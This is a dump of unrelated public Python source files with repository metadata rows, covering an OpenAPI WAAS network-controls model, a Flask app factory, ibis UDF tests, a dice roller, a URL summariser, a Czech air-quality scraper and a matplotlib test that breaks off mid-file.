The version of the OpenAPI document: 21.04.439
Generated by: https://openapi-generator.tech
"""
# Compatibility shim: inspect.getfullargspec exists only on Python 3;
# on Python 2 fall back to getargspec under the same name.
try:
    from inspect import getfullargspec
except ImportError:
    from inspect import getargspec as getfullargspec
import pprint
import re # noqa: F401
import six
from openapi_client.configuration import Configuration
# Auto-generated OpenAPI model -- regenerate from the spec rather than
# hand-editing.
class WaasNetworkControls(object):
    """NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech

    Do not edit the class manually.
    """

    """
    Attributes:
      openapi_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    openapi_types = {
        'advanced_protection_effect': 'WaasEffect',
        'countries': 'WaasAccessControls',
        'exception_subnets': 'list[str]',
        'subnets': 'WaasAccessControls'
    }

    # Maps Python attribute names to the camelCase JSON keys of the API.
    attribute_map = {
        'advanced_protection_effect': 'advancedProtectionEffect',
        'countries': 'countries',
        'exception_subnets': 'exceptionSubnets',
        'subnets': 'subnets'
    }

    def __init__(self, advanced_protection_effect=None, countries=None, exception_subnets=None, subnets=None, local_vars_configuration=None):  # noqa: E501
        """WaasNetworkControls - a model defined in OpenAPI"""  # noqa: E501
        if local_vars_configuration is None:
            local_vars_configuration = Configuration.get_default_copy()
        self.local_vars_configuration = local_vars_configuration

        self._advanced_protection_effect = None
        self._countries = None
        self._exception_subnets = None
        self._subnets = None
        self.discriminator = None

        # Only assign attributes that were explicitly provided, so unset
        # fields stay None and are still serialized by to_dict().
        if advanced_protection_effect is not None:
            self.advanced_protection_effect = advanced_protection_effect
        if countries is not None:
            self.countries = countries
        if exception_subnets is not None:
            self.exception_subnets = exception_subnets
        if subnets is not None:
            self.subnets = subnets

    @property
    def advanced_protection_effect(self):
        """Gets the advanced_protection_effect of this WaasNetworkControls.  # noqa: E501

        :return: The advanced_protection_effect of this WaasNetworkControls.  # noqa: E501
        :rtype: WaasEffect
        """
        return self._advanced_protection_effect

    @advanced_protection_effect.setter
    def advanced_protection_effect(self, advanced_protection_effect):
        """Sets the advanced_protection_effect of this WaasNetworkControls.

        :param advanced_protection_effect: The advanced_protection_effect of this WaasNetworkControls.  # noqa: E501
        :type advanced_protection_effect: WaasEffect
        """
        self._advanced_protection_effect = advanced_protection_effect

    @property
    def countries(self):
        """Gets the countries of this WaasNetworkControls.  # noqa: E501

        :return: The countries of this WaasNetworkControls.  # noqa: E501
        :rtype: WaasAccessControls
        """
        return self._countries

    @countries.setter
    def countries(self, countries):
        """Sets the countries of this WaasNetworkControls.

        :param countries: The countries of this WaasNetworkControls.  # noqa: E501
        :type countries: WaasAccessControls
        """
        self._countries = countries

    @property
    def exception_subnets(self):
        """Gets the exception_subnets of this WaasNetworkControls.  # noqa: E501

        Network lists for which requests completely bypass WAAS checks and protections.  # noqa: E501

        :return: The exception_subnets of this WaasNetworkControls.  # noqa: E501
        :rtype: list[str]
        """
        return self._exception_subnets

    @exception_subnets.setter
    def exception_subnets(self, exception_subnets):
        """Sets the exception_subnets of this WaasNetworkControls.

        Network lists for which requests completely bypass WAAS checks and protections.  # noqa: E501

        :param exception_subnets: The exception_subnets of this WaasNetworkControls.  # noqa: E501
        :type exception_subnets: list[str]
        """
        self._exception_subnets = exception_subnets

    @property
    def subnets(self):
        """Gets the subnets of this WaasNetworkControls.  # noqa: E501

        :return: The subnets of this WaasNetworkControls.  # noqa: E501
        :rtype: WaasAccessControls
        """
        return self._subnets

    @subnets.setter
    def subnets(self, subnets):
        """Sets the subnets of this WaasNetworkControls.

        :param subnets: The subnets of this WaasNetworkControls.  # noqa: E501
        :type subnets: WaasAccessControls
        """
        self._subnets = subnets

    def to_dict(self, serialize=False):
        """Returns the model properties as a dict"""
        result = {}

        # Nested models are converted recursively; to_dict implementations
        # taking only `self` are called without the serialize flag.
        def convert(x):
            if hasattr(x, "to_dict"):
                args = getfullargspec(x.to_dict).args
                if len(args) == 1:
                    return x.to_dict()
                else:
                    return x.to_dict(serialize)
            else:
                return x

        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            # When serializing, emit the JSON (camelCase) key instead of the
            # Python attribute name.
            attr = self.attribute_map.get(attr, attr) if serialize else attr
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: convert(x),
                    value
                ))
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], convert(item[1])),
                    value.items()
                ))
            else:
                result[attr] = convert(value)

        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, WaasNetworkControls):
            return False

        return self.to_dict() == other.to_dict()

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        if not isinstance(other, WaasNetworkControls):
            return True

        return self.to_dict() != other.to_dict()
| [
"aakatev@virtru.com"
] | aakatev@virtru.com |
b174000a9efc0a2cfcad23ba2a171ed686f20bdf | 97d34d62e4232e754c5f1a458b2d4068abadc1ab | /flask/flasky-master/app/__init__.py | 8438b924c8c21163e6af7b40d38c746c9ee4c1de | [
"MIT"
] | permissive | chenzhenpin/py_test | d0e4ae32ab43fae4da53d0f0ac7d89b77b041a96 | b05ed73210ab7ebdaa39d8ebcf9687d4ef16125c | refs/heads/master | 2022-12-27T10:21:54.114869 | 2018-12-06T02:04:31 | 2018-12-06T02:04:31 | 159,364,911 | 0 | 1 | null | 2022-12-15T14:30:38 | 2018-11-27T16:22:28 | Python | UTF-8 | Python | false | false | 1,256 | py | from flask import Flask
from flask_bootstrap import Bootstrap
from flask_mail import Mail
from flask_moment import Moment
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager
from flask_pagedown import PageDown
from config import config
# Flask extension singletons, created unbound and attached to a concrete
# app inside create_app() (application-factory pattern).
bootstrap = Bootstrap()
mail = Mail()
moment = Moment()
db = SQLAlchemy()
pagedown = PageDown()

login_manager = LoginManager()
# 'strong' invalidates the session if the client identity changes.
login_manager.session_protection = 'strong'
# Endpoint users are redirected to when a login is required.
login_manager.login_view = 'auth.login'
def create_app(config_name):
    """Application factory: build and configure a Flask app.

    ``config_name`` selects one of the configurations registered in the
    ``config`` mapping imported from the project's config module.
    """
    app = Flask(__name__)
    app.config.from_object(config[config_name])
    config[config_name].init_app(app)

    # Bind the module-level extension instances to this app.
    bootstrap.init_app(app)
    mail.init_app(app)
    moment.init_app(app)
    db.init_app(app)
    login_manager.init_app(app)
    pagedown.init_app(app)

    # Force HTTPS outside of debug/testing unless explicitly disabled.
    if not app.debug and not app.testing and not app.config['SSL_DISABLE']:
        from flask_sslify import SSLify
        sslify = SSLify(app)

    # Register blueprints: site pages, auth pages, and the v1.0 REST API.
    from .main import main as main_blueprint
    app.register_blueprint(main_blueprint)

    from .auth import auth as auth_blueprint
    app.register_blueprint(auth_blueprint, url_prefix='/auth')

    from .api_1_0 import api as api_1_0_blueprint
    app.register_blueprint(api_1_0_blueprint, url_prefix='/api/v1.0')

    return app
| [
"1595347682@qq.com"
] | 1595347682@qq.com |
ffd5af4e55a9c62b4108a72d9b8dd7da83f80184 | 5a9c11b0d7d9d1ef11c8404c2e38cf2f5c4c6744 | /myapp/migrations/0002_delete_test.py | 41afe6a17802a63e3ce82c28b340021dfa556f12 | [] | no_license | tlaboni-ecl/Demo_project | 7c671498c8f0f65520552c884b274cbbd2aea47c | 9ed5427d504e830df65ec1e8b17f218feb92ad83 | refs/heads/main | 2022-12-20T17:08:58.545689 | 2020-10-17T20:19:52 | 2020-10-17T20:19:52 | 304,962,116 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 280 | py | # Generated by Django 2.1.5 on 2020-10-17 06:00
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated migration: removes the ``test`` model from ``myapp``."""

    dependencies = [
        ('myapp', '0001_initial'),
    ]

    operations = [
        # Drops the model's table and its entry in Django's state.
        migrations.DeleteModel(
            name='test',
        ),
    ]
| [
"you@domain.com"
] | you@domain.com |
cc9fc4571d0de756eca3429627552998a832d55c | 2ce71cf8b2ab41b5ad26dbcb9b6cc5b8d27e632d | /ibis/pandas/tests/test_udf.py | 9a580c7e8331f1e32dc2db56ba648e0e41c4e422 | [
"Apache-2.0"
] | permissive | brandonwillard/ibis | 6f1341687df7bb15db7c655f0c7697efeb86357e | 93cc4ba8703a96e19660255e6e48e66d7cd69b31 | refs/heads/master | 2020-03-13T17:08:48.066938 | 2018-04-25T20:09:34 | 2018-04-25T20:09:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,444 | py | import pytest
import numpy as np
import pandas as pd
import pandas.util.testing as tm
import ibis
import ibis.expr.types as ir
import ibis.expr.datatypes as dt
from ibis.pandas.udf import udf, udaf, nullable
from ibis.pandas.dispatch import pause_ordering
# UDF/UDAF fixtures are registered with dispatch ordering paused so the
# whole batch is committed at once.
with pause_ordering():

    # Element-wise UDF: twice the string length of each value.
    @udf(input_type=[dt.string], output_type=dt.int64)
    def my_string_length(series, **kwargs):
        return series.str.len() * 2

    # Aggregate UDF (reduction): sum of twice the string lengths.
    @udaf(input_type=[dt.string], output_type=dt.int64)
    def my_string_length_sum(series, **kwargs):
        return (series.str.len() * 2).sum()

    # Binary aggregate UDF: Pearson correlation of two double columns.
    @udaf(input_type=[dt.double, dt.double], output_type=dt.double)
    def my_corr(lhs, rhs, **kwargs):
        return lhs.corr(rhs)

    @udf([dt.double], dt.double)
    def add_one(x):
        return x + 1.0

    # Accepts an optional `scope` keyword passed by the execution engine.
    @udf([dt.double], dt.double)
    def times_two(x, scope=None):
        return x * 2.0
def test_udf():
    """An element-wise UDF yields a column expression matching pandas."""
    frame = pd.DataFrame({'a': list('abc')})
    client = ibis.pandas.connect({'df': frame})
    table = client.table('df')

    expr = my_string_length(table.a)
    assert isinstance(expr, ir.ColumnExpr)

    observed = expr.execute()
    reference = table.a.execute().str.len().mul(2)
    tm.assert_series_equal(observed, reference)
def test_udaf():
    """An aggregate UDF yields a scalar expression matching pandas."""
    frame = pd.DataFrame({'a': list('cba')})
    client = ibis.pandas.connect({'df': frame})
    table = client.table('df')

    expr = my_string_length_sum(table.a)
    assert isinstance(expr, ir.ScalarExpr)

    observed = expr.execute()
    reference = table.a.execute().str.len().mul(2).sum()
    assert observed == reference
def test_udaf_in_groupby():
    # Four deterministic values plus three random ones, grouped by 'key'
    # into groups d (2 rows), e (2 rows) and f (3 rows).
    df = pd.DataFrame({
        'a': np.arange(4, dtype=float).tolist() + np.random.rand(3).tolist(),
        'b': np.arange(4, dtype=float).tolist() + np.random.rand(3).tolist(),
        'key': list('ddeefff')})
    con = ibis.pandas.connect({'df': df})
    t = con.table('df')

    expr = t.groupby(t.key).aggregate(my_corr=my_corr(t.a, t.b))
    assert isinstance(expr, ir.TableExpr)

    result = expr.execute().sort_values('key')

    # Reference: per-group Pearson correlation computed directly in pandas.
    dfi = df.set_index('key')
    expected = pd.DataFrame({
        'key': list('def'),
        'my_corr': [
            dfi.loc[value, 'a'].corr(dfi.loc[value, 'b']) for value in 'def'
        ]
    })

    # Compare only the relevant columns, in a fixed order.
    columns = ['key', 'my_corr']
    tm.assert_frame_equal(result[columns], expected[columns])
def test_nullable():
    """A (default) nullable column admits None as a Python value."""
    table = ibis.table([('a', 'int64')])
    assert nullable(table.a.type()) == (type(None),)
@pytest.mark.xfail(
    raises=AssertionError, reason='Nullability is not propagated')
def test_nullable_non_nullable_field():
    # Expected (but currently failing) behaviour: a non-nullable field
    # should produce an empty tuple of allowed Python null types.
    t = ibis.table([('a', dt.String(nullable=False))])
    assert nullable(t.a.type()) == ()
def test_udaf_parameter_mismatch():
    """Declaring one input type for a two-parameter UDAF must fail."""
    with pytest.raises(Exception):
        @udaf(input_type=[dt.double], output_type=dt.double)
        def two_params_one_type(left, right, **kwargs):
            pass
def test_udf_parameter_mismatch():
    """Declaring zero input types for a one-parameter UDF must fail."""
    with pytest.raises(Exception):
        @udf(input_type=[], output_type=dt.double)
        def one_param_no_types(value, **kwargs):
            return 1.0
def test_call_multiple_udfs():
    """Composed UDF calls execute as the composition of their functions."""
    frame = pd.DataFrame({
        'a': np.arange(4, dtype=float).tolist() + np.random.rand(3).tolist(),
        'b': np.arange(4, dtype=float).tolist() + np.random.rand(3).tolist(),
        'key': list('ddeefff')})
    client = ibis.pandas.connect({'df': frame})
    table = client.table('df')

    expr = times_two(add_one(table.a))
    observed = expr.execute()
    reference = frame.a.add(1.0).mul(2.0)
    tm.assert_series_equal(reference, observed)
| [
"cpcloud@gmail.com"
] | cpcloud@gmail.com |
5fad363ab88211dc685ce0fcd8f0c3dfbf84edfd | fb6e7922df3da2e9cdc37a00150d6d7663e907ff | /environment/rtfm/dynamics/dice.py | fbc50b78c60b350d2271d13d50dffc0476ae6757 | [
"Apache-2.0"
] | permissive | Spiph/GTG | c54a587002c42a032c89e8eceb5ec638f6c8c05f | 4a45032290d0c1364e4398684582c51094b245f5 | refs/heads/main | 2023-09-02T14:44:14.946624 | 2021-10-27T12:29:05 | 2021-10-27T12:29:05 | 393,086,007 | 0 | 0 | Apache-2.0 | 2021-08-05T15:09:07 | 2021-08-05T15:09:07 | null | UTF-8 | Python | false | false | 2,034 | py | # Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
import random
class Dice:
    """Abstract die. Subclasses implement ``roll`` and ``describe``."""

    def __init__(self):
        pass

    def roll(self):
        """Return one random outcome of this die."""
        raise NotImplementedError()

    def describe(self):
        """Return a human-readable dice-notation string."""
        raise NotImplementedError()

    @classmethod
    def from_str(cls, s):
        """Parse dice notation such as ``'2d6 + 3'``, ``'d20'`` or ``'5'``.

        Each '+'-separated term is either a plain integer (a constant die)
        or ``[N]dM`` meaning N M-sided dice, with N defaulting to 1. A
        single resulting die is returned directly; several are wrapped in
        a SumDice. Raises Exception on an unparsable term.
        """
        dice = []
        for sub in s.split('+'):
            sub = sub.strip()
            if 'd' not in sub:
                constant = int(sub)
                dice.append(ConstantDice(constant))
            else:
                # 'd' is guaranteed present here, so split('d') yields at
                # least two parts; exactly two is the only valid shape.
                # (The original also had a dead len == 1 branch, removed.)
                splits = sub.split('d')
                if len(splits) != 2:
                    raise Exception(
                        'could not parse dice string {} in main dice string {}'
                        .format(sub, s))
                num, max_roll = splits
                if num == '':
                    num = 1  # bare 'dM' means a single die
                dice.extend(
                    SingleDice(max=int(max_roll)) for _ in range(int(num)))
        return SumDice(dice) if len(dice) > 1 else dice[0]


class ConstantDice(Dice):
    """A 'die' that always rolls the same constant value."""

    def __init__(self, constant):
        super().__init__()
        self.constant = self.max = constant

    def roll(self):
        return self.constant

    def describe(self):
        return repr(self.constant)


class SingleDice(Dice):
    """A single fair die with faces 1..max."""

    def __init__(self, max=20):
        super().__init__()
        self.max = max

    def roll(self):
        return random.randint(1, self.max)

    def describe(self):
        return 'd{}'.format(self.max)


class SumDice(Dice):
    """The sum of several component dice."""

    def __init__(self, subdice):
        super().__init__()
        self.sub = subdice

    @property
    def max(self):
        # Maximum possible total: every component at its maximum.
        return sum(d.max for d in self.sub)

    def roll(self):
        return sum(d.roll() for d in self.sub)

    def describe(self):
        return ' + '.join([d.describe() for d in self.sub])
| [
"jzyjiangzhengyao@gmail.com"
] | jzyjiangzhengyao@gmail.com |
bfb953ab310f302eb8ffded9021eab8dcf3d59c9 | 3d19e1a316de4d6d96471c64332fff7acfaf1308 | /Users/J/jindrichmynarz/air_pollution.py | 2f4733075ffae9ef96d3f49abd1b74a7777bbad3 | [] | no_license | BerilBBJ/scraperwiki-scraper-vault | 4e98837ac3b1cc3a3edb01b8954ed00f341c8fcc | 65ea6a943cc348a9caf3782b900b36446f7e137d | refs/heads/master | 2021-12-02T23:55:58.481210 | 2013-09-30T17:02:59 | 2013-09-30T17:02:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,030 | py | ####################################
####################################
# Informace o kvalitě ovzduší v ČR #
####################################
# Scrapes hourly air-quality measurements for Czech stations from the
# Czech Hydrometeorological Institute (CHMI) portal.
#
# NOTE(review): this is Python 2 / ScraperWiki-classic code (urlparse
# module, old BeautifulSoup, scraperwiki.datastore). The original file
# contained the entire script duplicated verbatim; the duplicate copy has
# been removed -- the logic is otherwise unchanged.
import datetime, re, scraperwiki, urlparse
from BeautifulSoup import BeautifulSoup


def getEvaluation(node):
    """Extract a numeric reading from a table cell, or a status note.

    If the cell's <span> holds no number, the cell background colour
    encodes the status (Czech strings kept as stored in the dataset).
    """
    evaluation = re.match(
        "\d+(\.\d+)?",
        node.find("span").text.encode("utf8").replace(",", ".").replace(" ", "")
    )
    if evaluation:
        evaluation = evaluation.group()
    else:
        style = node["style"]
        if style == "background-color: white":
            evaluation = "Neúplná data"
        elif style == "background-color: #CFCFCF":
            evaluation = "Veličina se na uvedené stanici neměří"
        else:
            evaluation = ""
    return evaluation


def reformatDate(text):
    """Convert 'DD.MM.YYYY HH:MM' into ISO 8601 with a fixed +01:00 offset."""
    match = re.match(
        "(?P<day>\d{2})\.(?P<month>\d{2})\.(?P<year>\d{4})\s+(?P<hours>\d{2}):(?P<minutes>\d{2})",
        text
    )
    date = "{0[0]}-{0[1]}-{0[2]}T{0[3]}:{0[4]}:00+01:00".format(
        map(match.group, ["year", "month", "day", "hours", "minutes"])
    )
    return date


def reformatCoords(text):
    """Split a Czech 'lat sš lon vd' coordinate string into N/E parts."""
    latitude, longitude = text.encode("utf-8").replace(" sš ", "N\n").replace(" vd", "E").replace("°", "").replace("´", "'").split("\n")
    return latitude, longitude


def scrapeWeatherStation(url):
    """Fetch a station detail page; return (latitude, longitude, altitude)."""
    html = scraperwiki.scrape(url)
    soup = BeautifulSoup(html)
    tds = soup.find("table").findAll("td")
    altitude = re.match("\d+", tds[-1].text).group()
    latitude, longitude = reformatCoords(tds[-3].text)
    return latitude, longitude, altitude


# Record the column headers for the stored data.
scraperwiki.sqlite.save_var(
    "data_columns",
    [
        "code", "name", "owner",
        "province",  # Kraj
        "latitude", "longitude", "altitude",
        "time", "airquality", "SO2_1h",
        "NO2_1h", "CO_1h", "O3_1h", "PM10_1h",
        "PM10_24h"
    ]
)

# Fetch the overview page.
startingUrl = "http://portal.chmi.cz/files/portal/docs/uoco/web_generator/actual_hour_data_CZ.html"
html = scraperwiki.scrape(startingUrl)
soup = BeautifulSoup(html)

# The first table holds all measurement rows; row shape (td/th counts)
# distinguishes region headers, caption rows and station rows.
table = soup.find("table")
trs = table.findAll("tr")
for tr in trs:
    ths = tr.findAll("th")
    tds = tr.findAll("td")
    rowSignature = (len(tds), len(ths))
    if rowSignature == (0, 9):
        # Region header: region name plus the measurement timestamp.
        th = tr.find("th")
        province = th.text.replace("Kraj: ", "")
        th = th.findNext().text
        date = reformatDate(th)
    elif rowSignature == (0, 10):
        pass  # column-caption row, nothing to extract
    elif rowSignature == (10, 1):
        pass  # secondary caption row, nothing to extract
    elif rowSignature == (11, 0):
        # Station measurement row: walk the cells left to right.
        td = tr.find("td")
        identifier = td.find("a")
        code = identifier.text
        weatherStationUrl = urlparse.urljoin(startingUrl, identifier["href"])
        latitude, longitude, altitude = scrapeWeatherStation(weatherStationUrl)
        td = td.findNext().findNext()
        name = td.text
        td = td.findNext()
        owner = td.text
        td = td.findNext()
        airquality = getEvaluation(td)
        td = td.findNext("td")
        SO2_1h = getEvaluation(td)
        td = td.findNext("td")
        NO2_1h = getEvaluation(td)
        td = td.findNext("td")
        CO_1h = getEvaluation(td)
        td = td.findNext("td")
        O3_1h = getEvaluation(td)
        td = td.findNext("td")
        PM10_1h = getEvaluation(td)
        td = td.findNext("td").findNext("td")
        PM10_24h = getEvaluation(td)
        scraperwiki.datastore.save(["code"], {
            "code": code,
            "name": name,
            "owner": owner,
            "province": province,
            "latitude": latitude,
            "longitude": longitude,
            "altitude": altitude,
            "time": date,
            "airquality": airquality,
            "SO2_1h": SO2_1h,
            "NO2_1h": NO2_1h,
            "CO_1h": CO_1h,
            "O3_1h": O3_1h,
            "PM10_1h": PM10_1h,
            "PM10_24h": PM10_24h,
        }, date=datetime.datetime(*map(int, re.split('[^\d]', date)[:-2])))
    else:
        # Unknown row shape: fail loudly rather than store partial data.
        raise Exception
| [
"pallih@kaninka.net"
] | pallih@kaninka.net |
7b28757dca0e9585daaacf0aae60298e6545f140 | ebb63b057a82b8a10df305252cbcda4186ec02f7 | /taichi_blend/bundle-packages/melt/random_generator.py | b5cab4edc76ffef734527c01ec5d9bf5e01957b7 | [] | no_license | yjchoi1/taichi_blend | aa2d6f0129c8068b9a2c8bb5a7677b3c60923d5b | 907fdbee6027375324c9605ffc14db16e590f992 | refs/heads/master | 2023-03-21T12:31:04.126621 | 2021-03-01T15:06:13 | 2021-03-01T15:06:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 578 | py | from . import *
@A.register
class Def(IField):
    '''
    Name: random_generator
    Category: sampler
    Inputs: min:c max:c dim:i
    Output: sample:f
    '''

    # Field node producing uniform random samples in [min, max); when
    # dim > 0 each subscript yields a dim-component random vector.
    def __init__(self, min=0, max=1, dim=0):
        self.min = min
        self.max = max
        self.dim = dim

    @ti.func
    def random(self):
        # Scale ti.random()'s [0, 1) output into [min, max).
        return ti.random() * (self.max - self.min) + self.min

    @ti.func
    def _subscript(self, I):
        # ti.static() makes this a compile-time branch, so only the scalar
        # or the vector code path is materialized in the kernel.
        if ti.static(self.dim == 0):
            return self.random()
        else:
            return ti.Vector([self.random() for i in range(self.dim)])
| [
"1931127624@qq.com"
] | 1931127624@qq.com |
62bdf3e1d053de1b7c4bac023a257cd463d2a679 | d237e2624a30007bf8b1934057cd667f54245d40 | /url_summary/url_summary.py | 519893a361d74494357492e3d764243feefc29e2 | [
"MIT"
] | permissive | xidianwang412/url-summary | 8b64c6b374ecf155dd17de53c00eb4b9d2765177 | affb4a08d08d1c79d2df40cb318ae40d531e9583 | refs/heads/master | 2023-04-25T17:40:59.757519 | 2018-05-29T21:26:10 | 2018-05-29T21:26:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,826 | py | from collections import defaultdict
import random
from uuid import uuid4
from six.moves.urllib.parse import (
urlsplit, parse_qsl, ParseResult, urlunsplit, quote_plus)
from typing import Iterable
def get_summary(urls, top_items=20, top_urls=3, sample=True):
    # type: (Iterable[str], int, int) -> UrlSummaryResult
    """Summarize an iterable of ``urls``.

    URLs are bucketed by netloc, path prefix, query key and query
    key=value pair.  ``top_items`` (20 by default) limits how many
    top-level buckets are reported, and ``top_urls`` (3 by default) how
    many example URLs each bucket shows.  With ``sample`` enabled the
    examples are drawn pseudo-randomly; otherwise the first ones are used.

    Returns a UrlSummaryResult: a list subclass with a rich Jupyter
    Notebook display.
    """
    buckets = defaultdict(list)
    seen_values = defaultdict(set)
    for url in urls:
        buckets['all', ''].append(url)
        parts = urlsplit(url)  # type: ParseResult
        buckets['netloc', format(parts.netloc)].append(url)
        segments = parts.path.rstrip('/').split('/')
        # Every path prefix of depth >= 2 gets its own bucket.
        for depth in range(2, len(segments) + 1):
            buckets['path start', '/'.join(segments[:depth])].append(url)
        for key, value in _parse_qsl(parts.query or ''):
            buckets['query key', '?{}'.format(key)].append(url)
            seen_values[key].add(value)
            buckets['query key=value', '?{}={}'.format(key, value)].append(url)

    # Largest buckets first; ties broken by bucket key for determinism.
    ranked = sorted(buckets.items(), key=lambda item: (-len(item[1]), item[0]))
    summary = []
    for group, group_urls in ranked[:top_items]:
        stat = {
            'len': len(group_urls),
            'sample': sorted(_sample(group_urls, top_urls, sample=sample)),
        }
        if group[0] == 'query key':
            # Number of distinct values seen for this query key.
            stat['len_v_set'] = len(seen_values.get(group[1][1:]))
        summary.append((group, stat))
    return UrlSummaryResult(summary)
def _sample(lst, n, seed=42, sample=True):
if len(lst) <= n:
return lst
elif sample:
random.seed(seed)
return random.sample(lst, n)
else:
return lst[:n]
def _quote(s):
    # Percent-encode for display, keeping "/" readable in path components.
    return quote_plus(s, safe='/')
def _parse_qsl(s):
    # keep_blank_values=True so "?key=" and "?key" still register the key.
    return parse_qsl(s, keep_blank_values=True)
def _bold(x, bold=True):
return '<b style="color: black">{}</b>'.format(x) if bold else x
def _urlencode_quoted(x):
return '&'.join('{}={}'.format(k, v) for k, v in x)
class UrlSummaryResult(list):
    """List of ((field, value), stat) pairs with a rich Jupyter display.

    Each stat dict carries ``len`` (bucket size), ``sample`` (example URLs)
    and, for query-key buckets, ``len_v_set`` (count of distinct values).
    """

    def _repr_html_(self):
        # Jupyter hook: render every summary entry as a collapsible <li>.
        return '<ul>{}</ul>'.format(
            '\n'.join(self._render_sample(field, value, stat)
                      for (field, value), stat in self))

    def _render_sample(self, field, value, stat):
        el_id = uuid4()
        # Using "hidden" class defined by the Jupyter notebook
        sample_elements = [self._render_url(url, field, value)
                           for url in stat['sample']]
        if stat['len'] > len(sample_elements):
            # Signal that the sample is truncated.
            sample_elements.append('…')
        # The inline onclick handler toggles the nested <ul> and flips the
        # expand/collapse arrow glyph.
        return '''\
<li>
<span href="#" style="cursor: pointer"
onclick="\
var el = document.getElementById('{id}'); \
this.getElementsByTagName('SPAN')[0].textContent = \
el.classList.contains('hidden') ? '▼' : '►'; \
el.classList.toggle('hidden')"
>{n:,} {field}: <b>{value}</b>{extra} <span>►</span></span>
<ul id="{id}" class="hidden" style="margin-top: 0">{sample}</ul>
</li>'''.format(
            id=el_id,
            n=stat['len'],
            field=field,
            value=value,
            extra=(' ({len_v_set:,} unique values)'.format(**stat)
                   if 'len_v_set' in stat else ''),
            sample='\n'.join('<li>{}</li>'.format(el)
                             for el in sample_elements),
        )

    def _render_url(self, url, field, value):
        # Link to the URL itself; bold the component that defined the bucket.
        return '<a href="{href}" target="_blank">{url}</a>'.format(
            href=url, url=self._highlight(url, field, value))

    def _highlight(self, url, field, value):
        # Re-assemble the URL with the bucket-defining part wrapped in <b>.
        if field == 'all':
            return url
        parsed = urlsplit(url)  # type: ParseResult
        netloc = parsed.netloc
        path = parsed.path
        query = parsed.query
        if field == 'netloc':
            netloc = _bold(parsed.netloc)
        elif field == 'path start':
            # value is the matched path prefix; bold that many characters
            # of the path (minus the leading slash).
            s = len(value)
            path = '{}{}'.format(_bold(parsed.path[1:s]), parsed.path[s:])
        elif field == 'query key':
            key_value = value[1:]
            query = _urlencode_quoted(
                [(_bold(_quote(k), k == key_value), _quote(v))
                 for k, v in _parse_qsl(query)])
        elif field == 'query key=value':
            key_value, value_value = value[1:].split('=', 1)
            query = _urlencode_quoted(
                [(_bold(_quote(k), bold), _bold(_quote(v), bold))
                 for bold, k, v in (
                     (k == key_value and v == value_value, k, v)
                     for k, v in _parse_qsl(query))])
        return urlunsplit((parsed.scheme, netloc, path, query, parsed.fragment))
| [
"kostia.lopuhin@gmail.com"
] | kostia.lopuhin@gmail.com |
4620ec8b24a8b30d7078db3e41d39d5b8bd26563 | 449b3edf6ed1649f64f133533d6214f6679e6f2c | /customers/urls.py | 56177910b5e6f49a051e05a280b2230ab46e2888 | [
"MIT"
] | permissive | endonte/quotation2 | bbd82b0ab0ad524d19294e14bcc4752949cbbe03 | ddb9bf2f98ea8b45c9c43f272e61bb85fb563613 | refs/heads/master | 2021-01-15T14:19:36.476070 | 2017-08-21T07:20:07 | 2017-08-21T07:20:07 | 99,687,769 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 154 | py | from django.conf.urls import url
from .views import CustomerListView
# Route the app root to the customer list; named for {% url %} reversing.
urlpatterns = [
    url(r'^$', CustomerListView.as_view(), name='customer_list'),
]
| [
"endonte88@gmail.com"
] | endonte88@gmail.com |
6885710c04ad189c6b12a2d576cb1720f585575d | 3ebed5d25b0f325736e435f03fb7cbf027a18da4 | /emc/memberArea/content/todo.py | e9aa77b5821b18022f4476034567cd627719d21f | [] | no_license | adam139/emc.memberArea | 82950eca452c781d0976d5f1c5c3140526f5823e | a549074240d780933cb590ce46c78bdecdbda654 | refs/heads/master | 2022-05-31T18:44:58.841750 | 2020-09-29T12:59:16 | 2020-09-29T12:59:16 | 47,908,455 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 172 | py | #-*- coding: UTF-8 -*-
from plone.directives import form
class ITodo(form.Schema):
"""
emc project member area personal todo items container content type
"""
| [
"yuejun.tang@gmail.com"
] | yuejun.tang@gmail.com |
8eac734c22821c8104fc1c4200d29219a39df2d8 | 0c955ea058eae749695835b31d07f60775631f36 | /test_plots/test_patches.py | cbcab29018475b5a3089ff91f30d532cf115c260 | [
"BSD-3-Clause"
] | permissive | Ahmed/mpld3 | f75934ee5e0da196eb4440f19b54cbf9dab58d0c | edb9c82e1555b778adea932a55b51ca6dc3de6e4 | refs/heads/master | 2020-12-07T00:33:17.193173 | 2014-04-02T09:39:22 | 2014-04-02T09:39:22 | 18,023,559 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,327 | py | """Plot to test patches"""
import matplotlib.pyplot as plt
from matplotlib import patches
import numpy as np
def main():
    """Build and return a figure showcasing the matplotlib patch primitives."""
    fig, ax = plt.subplots()
    ax.grid(color='lightgray')

    def random_color():
        # Random RGB triple in [0, 1).
        return np.random.random(3)

    demo_patches = [
        patches.Arrow(0.75, 0.75, 0.5, 0.5),
        patches.Circle((1, 2), 0.4),
        patches.RegularPolygon((1, 3), 5, 0.4),
        patches.Rectangle((1.6, 0.75), 0.8, 0.5),
        patches.CirclePolygon((2, 2), 0.4),
        patches.Polygon([[1.75, 3], [2, 3.25], [2.25, 3],
                         [2, 2.75], [1.75, 3]]),
        patches.Wedge((3, 1), 0.4, 0, 270),
